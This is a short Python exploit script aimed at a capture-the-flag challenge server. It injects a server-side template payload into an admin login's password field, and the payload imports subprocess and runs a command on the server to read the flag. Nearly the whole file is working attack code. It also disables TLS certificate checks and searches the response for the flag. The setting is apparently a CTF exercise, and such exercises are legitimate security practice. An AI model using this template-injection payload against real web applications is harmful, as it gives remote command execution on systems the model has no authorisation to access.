#!/usr/bin/env python3
"""
Test SSTI in admin password field
"""

import requests
import urllib3
urllib3.disable_warnings()

BASE_URL = "https://vulnerability-research-dbfd88d4dab49dc2.chals.uoftctf.org"

# Try SSTI in password field
payload = "{{=__import__('subprocess').check_output(['/readflag']).decode()}}"

response = requests.post(
    BASE_URL + "/admin/default/index",
    data={
        "password": payload,
        "send": "/admin/default/site",
        "login": "Login"
    },
    verify=False
)

print(f"Status: {response.status_code}")
print(f"Length: {len(response.text)}")

if "uoftctf" in response.text.lower():
    print("\n[!!!] FLAG FOUND!")
    idx = response.text.lower().find("uoftctf")
    print(response.text[idx:idx+100])
else:
    print("No flag found")
    
with open("admin_response.html", "w", encoding="utf-8") as f:
    f.write(response.text)
print("Saved to admin_response.html")

# Also check for any error messages or interesting output
if "incorrect" in response.text.lower() or "invalid" in response.text.lower():
    print("\n[+] Password rejected")
if payload in response.text or "SSTI" in response.text:
    print("[+] Payload might be reflected")